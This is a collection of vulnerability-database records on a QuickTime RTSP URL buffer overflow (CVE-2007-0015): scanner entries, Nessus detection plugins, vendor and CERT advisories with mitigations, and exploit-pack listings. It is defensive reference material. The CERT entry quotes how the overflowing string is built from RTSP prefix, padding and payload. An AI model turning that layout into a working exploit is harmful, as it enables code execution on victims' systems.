{"saint": [{"lastseen": "2022-01-26T11:33:39", "description": "Added: 01/04/2007 \nCVE: [CVE-2007-0015](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015>) \nBID: [21829](<http://www.securityfocus.com/bid/21829>) \nOSVDB: [31023](<http://www.osvdb.org/31023>) \n\n\n### Background\n\n[QuickTime](<http://www.apple.com/quicktime/player/>) is a media player for Windows and Mac OS platforms. \n\n### Problem\n\nA buffer overflow in QuickTime allows command execution when a user opens a specially crafted QTL file containing a long `**src**` parameter starting with `**rtsp://**`. \n\n### Resolution\n\nDo not open QTL files using QuickTime. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/442497> \n\n\n### Limitations\n\nExploit works on QuickTime 7.1.3.100 and requires a user to open the exploit in QuickTime. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2007-01-04T00:00:00", "type": "saint", "title": "QuickTime rtsp src URL buffer overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0015"], "modified": "2007-01-04T00:00:00", "id": "SAINT:8337315F83A09F3FAB1F8E9AD57C3E2B", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/quicktime_rtsp_src", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:39", "description": "Added: 01/04/2007 \nCVE: [CVE-2007-0015](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015>) \nBID: [21829](<http://www.securityfocus.com/bid/21829>) \nOSVDB: 
[31023](<http://www.osvdb.org/31023>) \n\n\n### Background\n\n[QuickTime](<http://www.apple.com/quicktime/player/>) is a media player for Windows and Mac OS platforms. \n\n### Problem\n\nA buffer overflow in QuickTime allows command execution when a user opens a specially crafted QTL file containing a long `**src**` parameter starting with `**rtsp://**`. \n\n### Resolution\n\nDo not open QTL files using QuickTime. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/442497> \n\n\n### Limitations\n\nExploit works on QuickTime 7.1.3.100 and requires a user to open the exploit in QuickTime. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2007-01-04T00:00:00", "type": "saint", "title": "QuickTime rtsp src URL buffer overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0015"], "modified": "2007-01-04T00:00:00", "id": "SAINT:DC0373185C785EAA3F33793CD2BAD62B", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/quicktime_rtsp_src", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-10-03T15:01:55", "description": "Added: 01/04/2007 \nCVE: [CVE-2007-0015](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015>) \nBID: [21829](<http://www.securityfocus.com/bid/21829>) \nOSVDB: [31023](<http://www.osvdb.org/31023>) \n\n\n### Background\n\n[QuickTime](<http://www.apple.com/quicktime/player/>) is a media player for Windows and Mac OS platforms. 
\n\n### Problem\n\nA buffer overflow in QuickTime allows command execution when a user opens a specially crafted QTL file containing a long `**src**` parameter starting with `**rtsp://**`. \n\n### Resolution\n\nDo not open QTL files using QuickTime. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/442497> \n\n\n### Limitations\n\nExploit works on QuickTime 7.1.3.100 and requires a user to open the exploit in QuickTime. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2007-01-04T00:00:00", "type": "saint", "title": "QuickTime rtsp src URL buffer overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2007-0015"], "modified": "2007-01-04T00:00:00", "id": "SAINT:1D9942467E3D50BE1212A32BC6512414", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/quicktime_rtsp_src", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-07-29T16:40:12", "description": "Added: 01/04/2007 \nCVE: [CVE-2007-0015](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015>) \nBID: [21829](<http://www.securityfocus.com/bid/21829>) \nOSVDB: [31023](<http://www.osvdb.org/31023>) \n\n\n### Background\n\n[QuickTime](<http://www.apple.com/quicktime/player/>) is a media player for Windows and Mac OS platforms. \n\n### Problem\n\nA buffer overflow in QuickTime allows command execution when a user opens a specially crafted QTL file containing a long `**src**` parameter starting with `**rtsp://**`. \n\n### Resolution\n\nDo not open QTL files using QuickTime. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/442497> \n\n\n### Limitations\n\nExploit works on QuickTime 7.1.3.100 and requires a user to open the exploit in QuickTime. 
\n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2007-01-04T00:00:00", "type": "saint", "title": "QuickTime rtsp src URL buffer overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0015"], "modified": "2007-01-04T00:00:00", "id": "SAINT:3FC256AB806C94E5DBC9B040FE7CF4D7", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/quicktime_rtsp_src", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-10-16T16:08:26", "description": "A buffer overflow vulnerability exists in the RTSP URL handler in the version of QuickTime installed on the remote host. 
Using either HTML, JavaScript or a QTL file as an attack vector and an RTSP URL with a long path component, a remote attacker may be able to leverage this issue to execute arbitrary code on the remote host subject to the user's privileges.", "cvss3": {"score": null, "vector": null}, "published": "2007-02-02T00:00:00", "type": "nessus", "title": "QuickTime RTSP URL Handler Buffer Overflow (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0015"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:apple:quicktime"], "id": "QUICKTIME_RTSP_URL_HANDLER_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/24268", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24268);\n script_version(\"1.23\");\n\n script_cve_id(\"CVE-2007-0015\");\n script_bugtraq_id(21829);\n script_xref(name:\"CERT\", value:\"442497\");\n\n script_name(english:\"QuickTime RTSP URL Handler Buffer Overflow (Windows)\");\n script_summary(english:\"Checks version of QuickTime on Windows\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote version of QuickTime is affected by a buffer overflow\nvulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"A buffer overflow vulnerability exists in the RTSP URL handler in the\nversion of QuickTime installed on the remote host. 
Using either HTML,\nJavaScript or a QTL file as an attack vector and an RTSP URL with a \nlong path component, a remote attacker may be able to leverage this \nissue to execute arbitrary code on the remote host subject to the \nuser's privileges.\" );\n # http://applefun.blogspot.com/2007/01/moab-01-01-2007-apple-quicktime-rtsp.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ebb12673\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://projects.info-pull.com/moab/MOAB-01-01-2007.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://docs.info.apple.com/article.html?artnum=304989\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.apple.com/archives/Security-announce/2007/Jan/msg00000.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.flexera.com/vulnerability-management/2007/01/quicktime-update-me-and-stay-vulnerable/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Apple's Security Update 2007-001, which is available via the\n'Apple Software Update' application, installed with the most recent\nversion of QuickTime or iTunes.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n 
script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/02/02\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/01/01\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:quicktime\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n \n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"quicktime_installed.nasl\");\n script_require_keys(\"SMB/QuickTime/Version\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\n\n\nver_ui = get_kb_item(\"SMB/QuickTime/Version_UI\");\nver = get_kb_item(\"SMB/QuickTime/Version\");\nif (isnull(ver)) exit(0);\n\niver = split(ver, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\nif (\n iver[0] < 7 || \n (\n iver[0] == 7 && \n (\n iver[1] < 1 ||\n (\n iver[1] == 1 &&\n (\n iver[2] < 3 ||\n (iver[2] == 3 && iver[3] < 191)\n )\n )\n )\n )\n)\n{\n if (report_verbosity > 0 && ver_ui)\n {\n report = string(\n \"\\n\",\n \"QuickTime \", ver_ui, \" is currently installed on the remote host.\\n\"\n );\n security_warning(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_warning(get_kb_item(\"SMB/transport\"));\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-30T16:07:49", "description": "The remote host is running a version of Mac OS X 10.3 or 10.4 which does not have Security Update 2007-001 applied.\n\nThis update fixes a flaw in QuickTime which may allow a rogue website to execute arbitrary code on the remote host by exploiting an overflow in the RTSP URL handler.", "cvss3": {"score": null, "vector": null}, "published": "2007-01-24T00:00:00", "type": "nessus", "title": "Mac OS X Security Update 2007-001", "bulletinFamily": 
"scanner", "cvss2": {}, "cvelist": ["CVE-2007-0015"], "modified": "2022-06-29T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2007-001.NASL", "href": "https://www.tenable.com/plugins/nessus/24234", "sourceData": "#TRUSTED\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24234);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/29\");\n\n script_cve_id(\"CVE-2007-0015\");\n script_bugtraq_id(21829);\n\n script_name(english:\"Mac OS X Security Update 2007-001\");\n script_summary(english:\"Check for the presence of the SecUpdate 2007-001\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update which fixes a security\nissue.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.3 or 10.4 which\ndoes not have Security Update 2007-001 applied.\n\nThis update fixes a flaw in QuickTime which may allow a rogue website to\nexecute arbitrary code on the remote host by exploiting an overflow in\nthe RTSP URL handler.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://docs.info.apple.com/article.html?artnum=304989\");\n # http://www.apple.com/support/downloads/securityupdate2007001universal.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c80700ff\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.apple.com/support/downloads/securityupdate2007001panther.html\");\n script_set_attribute(attribute:\"solution\", value:\"Install Security Update 2007-001.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/01/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/01/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2007-2022 Tenable Network Security, Inc.\");\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS ||\n get_one_kb_item('HostLevelChecks/proto') == 'local')\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nfunction exec(cmd)\n{\n local_var buf, ret, soc;\n\n if ( islocalhost() )\n buf = pread(cmd:\"/bin/bash\", argv:make_list(\"bash\", \"-c\", cmd));\n else\n {\n ret = ssh_open_connection();\n if ( ! 
ret ) exit(0);\n buf = ssh_cmd(cmd:cmd);\n ssh_close_connection();\n }\n\n if ( buf !~ \"^[0-9]\" ) exit(0);\n\n buf = chomp(buf);\n return buf;\n}\n\n# Look at the exact version of QuickTimeStreaming\ncmd = GetBundleVersionCmd(file:\"QuickTimeStreaming.component\", path:\"/System/Library/Quicktime\");\nbuf = exec(cmd:cmd);\nset_kb_item(name:\"MacOSX/QuickTimeSteaming/Version\", value:buf);\n\nversion = split(buf, sep:'.', keep:FALSE);\n\nif (( int(version[0]) == 7 && int(version[1]) < 1 ) ||\n ( int(version[0]) == 7 && int(version[1]) == 1 && int(version[2]) < 3 ) ) {\n\t security_warning( 0 );\n\texit(0);\n}\nelse if ( int(version[0]) == 7 && int(version[1]) == 1 && int(version[2]) == 3 )\n{\n cmd = _GetBundleVersionCmd(file:\"QuickTimeStreaming.component\", path:\"/System/Library/Quicktime\", label:\"SourceVersion\");\n buf = exec(cmd:cmd);\n if ( int(buf) < 4650200 ) security_warning(0);\n}\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-03-10T16:33:47", "description": "Apple QuickTime is a multimedia player that supports a wide range of media formats. The software supports parsing and displaying still image files as well as numerous audio and video formats. It also provides libraries and plugins for other applications, such as browsers, to read QuickTime media files. There exists a stack buffer overflow vulnerability in Apple QuickTime. The vulnerability is caused due to lack of boundary checks when processing the \"rtsp://\" URLs. By enticing the target user, a remote unauthenticated attacker may leverage the vulnerability to inject and execute arbitrary code in the security context of the currently logged in user. In an attack case where code injection is not successful, the affected application will terminate abnormally. 
In a more sophisticated attack where code injection results might be successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.", "cvss3": {}, "published": "2014-04-16T00:00:00", "type": "checkpoint_advisories", "title": "Apple Quicktime RTSP URL Buffer Overflow - Ver2 (CVE-2007-0015)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0015"], "modified": "2014-04-16T00:00:00", "id": "CPAI-2007-209", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-07T15:17:21", "description": "A buffer overflow vulnerability has been reported in Apple QuickTime. The vulnerability is due to lack of boundary checks when processing the \"rtsp://\" URLs. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system or cause application crashes.", "cvss3": {}, "published": "2014-04-16T00:00:00", "type": "checkpoint_advisories", "title": "Apple Quicktime RTSP URL Buffer Overflow - Ver2 (CVE-2007-0015)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2007-0015"], "modified": "2014-04-16T00:00:00", "id": "CPAI-2014-1406", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cert": [{"lastseen": "2021-09-28T17:51:52", "description": "### Overview\n\nApple QuickTime may allow remote arbitrary code to be executed via a long src parameter in RTSP URL strings.\n\n### Description\n\nA vulnerability exists in the way Apple QuickTime handles specially crafted Real Time Streaming Protocol ([RTSP](<http://www.ietf.org/rfc/rfc2326.txt>)) URL strings. An attacker may be able to craft a [QTL](<http://developer.apple.com/documentation/QuickTime/QT4WebPage/samplechap/special-11.html>) file to take advantage of this vulnerability. However, there are other attack vectors that do not involve QTL files. According to [MOAB-01-01-2007](<http://projects.info-pull.com/moab/MOAB-01-01-2007.html>):\n\n_By supplying a specially crafted string (rtsp:// [random] + semicolon + [299 bytes padding + payload]), an attacker could overflow a stack-based buffer, using either HTML, Javascript or a QTL file as attack vector, leading to an exploitable remote arbitrary code execution condition._ \nNote that since QuickTime is a component of Apple iTunes, iTunes installations are also affected by this vulnerability. We are aware of publicly available proof-of-concept code that exploits this vulnerability. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker may be able to execute arbitrary code or cause a denial of service. 
\n \n--- \n \n### Solution\n\n**Apply Update** \nThis issue is addressed in Apple Security Update [2007-001](<http://docs.info.apple.com/article.html?artnum=304989>). An update for Mac OS X is available on [Apple Downloads](<http://www.apple.com/support/downloads/>) and via Software Update. An update for Microsoft Windows XP and 2000 systems is available via the [Apple Software Update](<http://docs.info.apple.com/article.html?artnum=304264>) application installed with QuickTime 7.1.3. \n \n--- \n \n \n**Disable the QuickTime ActiveX controls in Internet Explorer** \n \nThe vulnerable QuickTime ActiveX controls can be disabled in Internet Explorer by setting the kill bit for the following CLSIDs: \n \n`{02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}` \n`{4063BE15-3B08-470D-A0D5-B37161CFFD69}` \nMore information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). Alternatively, the following text can be saved as a `.REG` file and imported to set the kill bit for these controls: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}]` \n`\"Compatibility Flags\"=dword:00000400` \n \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{4063BE15-3B08-470D-A0D5-B37161CFFD69}]` \n`\"Compatibility Flags\"=dword:00000400` \n**Disable the QuickTime plug-in for Mozilla-based browsers** \n \nUsers of Mozilla-based browsers, such as Firefox, can disable the QuickTime plugin, as specified in the PluginDoc article [Uninstalling Plugins](<http://plugindoc.mozdev.org/faqs/uninstall.html>). \n \n**Disable file association for QuickTime files** \n \nDisable the file association for QuickTime file types to help prevent Windows applications from using Apple QuickTime to open QuickTime files. 
This can be accomplished by deleting the following registry keys: \n \n`HKEY_CLASSES_ROOT\\QuickTime.*` \nThis will remove the association for approximately 32 file types that are configured to open with the QuickTime Player software. \n \n**Disable JavaScript** \n \nFor instructions on how to disable JavaScript, please refer to the [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/>) document. This can help prevent some attack techniques that use the QuickTime plug-in or ActiveX control. \n \n**Do not access QuickTime files from untrusted sources** \n \nAttackers may host malicious QuickTime files on web sites. In order to convince users to visit their sites, those attackers often use a variety of techniques to create misleading links including URL encoding, IP address variations, long URLs, and intentional misspellings. Do not click on unsolicited links received in email, instant messages, web forums, or internet relay chat (IRC) channels. Type URLs directly into the browser to avoid these misleading links. While these are generally good security practices, following these behaviors will not prevent exploitation of this vulnerability in all cases, particularly if a trusted site has been compromised or allows cross-site scripting. \n \n--- \n \n### Vendor Information\n\n442497\n\n### Apple Computer, Inc. 
__ Affected\n\nNotified: January 02, 2007 Updated: January 23, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Apple Security Update [2007-001](<http://docs.info.apple.com/article.html?artnum=304989>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23442497 Feedback>).\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://projects.info-pull.com/moab/MOAB-01-01-2007.html>\n * <http://secunia.com/advisories/23540/>\n * <http://www.securityfocus.com/bid/21829>\n * <http://plugindoc.mozdev.org/faqs/uninstall.html>\n * <http://support.microsoft.com/kb/240797>\n * <http://docs.info.apple.com/article.html?artnum=304989>\n * <http://docs.info.apple.com/article.html?artnum=106704>\n * <http://docs.info.apple.com/article.html?artnum=304264>\n * [http://search.info.apple.com/?search=Go&q=2007-001](<http://search.info.apple.com/?search=Go&q=2007-001>)\n * <http://lists.apple.com/archives/Security-announce/2007/Jan/msg00000.html>\n * [http://search.info.apple.com/?search=Go&q=2007-001](<http://search.info.apple.com/?search=Go&q=2007-001>)\n * <http://secunia.com/blog/7/>\n\n### Acknowledgements\n\nThis issue was reported in MOAB-01-01-2007.\n\nThis document was written by Chris Taschner and Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0015](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-0015>) \n---|--- \n**Severity Metric:** | 27.00 \n**Date Public:** | 2007-01-02 \n**Date First Published:** | 2007-01-02 \n**Date Last Updated: ** | 2007-01-25 22:05 UTC \n**Document Revision: ** | 45 \n", "cvss3": {}, "published": "2007-01-02T00:00:00", "type": "cert", 
"title": "Apple QuickTime RTSP buffer overflow", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0015"], "modified": "2007-01-25T22:05:00", "id": "VU:442497", "href": "https://www.kb.cert.org/vuls/id/442497", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T11:28:48", "description": "Buffer overflow in Apple QuickTime 7.1.3 allows remote attackers to execute arbitrary code via a long rtsp:// URI.", "cvss3": {}, "published": "2007-01-01T23:28:00", "type": "cve", "title": "CVE-2007-0015", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0015"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:apple:quicktime:7.1.3"], "id": "CVE-2007-0015", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0015", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:quicktime:7.1.3:*:*:*:*:*:*:*"]}], "canvas": [{"lastseen": "2021-07-28T14:33:10", "description": "**Name**| qt_rtsp \n---|--- \n**CVE**| CVE-2007-0015 
\n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Apple QuickTime rtsp URL Handler Overflow \n**Notes**| CVE Name: CVE-2007-0015 \nVENDOR: Apple \nVersionsAffected: \nRepeatability: \nReferences: http://projects.info-pull.com/moab/MOAB-01-01-2007.html \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015 \nDate public: \nCVSS: 6.8 \n\n", "edition": 3, "cvss3": {}, "published": "2007-01-01T23:28:00", "title": "Immunity Canvas: QT_RTSP", "type": "canvas", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0015"], "modified": "2007-01-01T23:28:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/qt_rtsp", "id": "QT_RTSP", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:20", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n National Cyber Alert System\r\n\r\n Technical Cyber Security Alert TA07-005A\r\n\r\n\r\nApple QuickTime RTSP Buffer Overflow\r\n\r\n Original release date: January 05, 2007\r\n Last revised: --\r\n Source: US-CERT\r\n\r\n\r\nSystems Affected\r\n\r\n Apple QuickTime on systems running\r\n\r\n * Apple Mac OS X\r\n\r\n * Microsoft Windows\r\n\r\n Note that Apple iTunes and other software using the vulnerable\r\n QuickTime components are also affected.\r\n\r\n\r\nOverview\r\n\r\n Apple QuickTime contains a buffer overflow in the handling of RTSP\r\n URLs. 
This can allow a remote attacker to execute arbitrary code on a\r\n vulnerable system.\r\n\r\n\r\nI. Description\r\n\r\n A vulnerability exists in the way Apple QuickTime handles specially\r\n crafted Real Time Streaming Protocol (RTSP) URL strings. Public\r\n exploit code is available that demonstrates how opening a .QTL file\r\n triggers the buffer overflow. However, we have confirmed that other\r\n attack vectors for the vulnerability also exist.\r\n\r\n Possible attack vectors include\r\n\r\n * a web page that uses the QuickTime plug-in or ActiveX control\r\n\r\n * a web page that uses the rtsp:// protocol\r\n\r\n * a file that is associated with the QuickTime Player\r\n\r\n US-CERT is tracking this issue as VU#442497. This reference number\r\n corresponds to CVE-2007-0015.\r\n\r\n Note that this vulnerability affects QuickTime on Microsoft Windows\r\n and Apple Mac platforms. Although web pages can be used as attack\r\n vectors, this vulnerability is not dependent on the specific web\r\n browser that is used.\r\n\r\n\r\nII. Impact\r\n\r\n By convincing a user to open specially crafted QuickTime content, a\r\n remote, unauthenticated attacker can execute arbitrary code on a\r\n vulnerable 